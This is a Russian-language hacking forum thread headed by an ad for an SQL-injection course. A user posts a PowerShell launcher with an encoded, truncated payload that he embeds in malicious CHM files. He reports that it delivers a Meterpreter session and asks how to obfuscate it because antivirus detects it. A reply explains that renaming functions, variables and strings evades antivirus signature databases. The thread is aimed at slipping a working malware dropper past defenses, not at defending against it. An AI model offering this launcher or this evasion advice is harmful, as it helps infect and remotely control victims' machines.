• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Обфускация powershell-кода для последующего внедрения в CHM-файл

A

AlCat

Active member
30.10.2018
38
0
BIT
0
Сгенерирован код.
Код: 
powershell -w 1 -C sv YnA -;sv n ec;sv GHP ((gv YnA).value.toString()+(gv n).value.toString());powershell (gv GHP).value.toString() 'JAB3AFYAUwBBACAAPQAgACcAJA....,бла-бла-еще_много_букавок_H0A'
Позже код используется для внедрения в CHM-файл как описано тут Вредоносные CHM
Всё работает, сессия метерпертера прилетает, но палится сие антивирусами. То есть нужно провести обфускацию.

Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
 
Сортировать по дате Сортировать по голосам
f22

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
962
AlCat сказал(а):
Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
Нажмите, чтобы раскрыть...
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

Ссылка скрыта от гостей
 
За 0 Против
A

AlCat

Active member
30.10.2018
38
0
BIT
0
f22 сказал(а):
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

Ссылка скрыта от гостей
Нажмите, чтобы раскрыть...
Спасибо что обратили внимание на мой вопрос.
Касаемо статьи на "хакере" -
Ссылка скрыта от гостей
.

...все таки с проблемой нужно переспать. )
С утра соображается лучше.
 
Последнее редактирование:
За 0 Против
f22

f22

Codeby Academy
Gold Team
05.05.2019
1 834
225
BIT
962
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ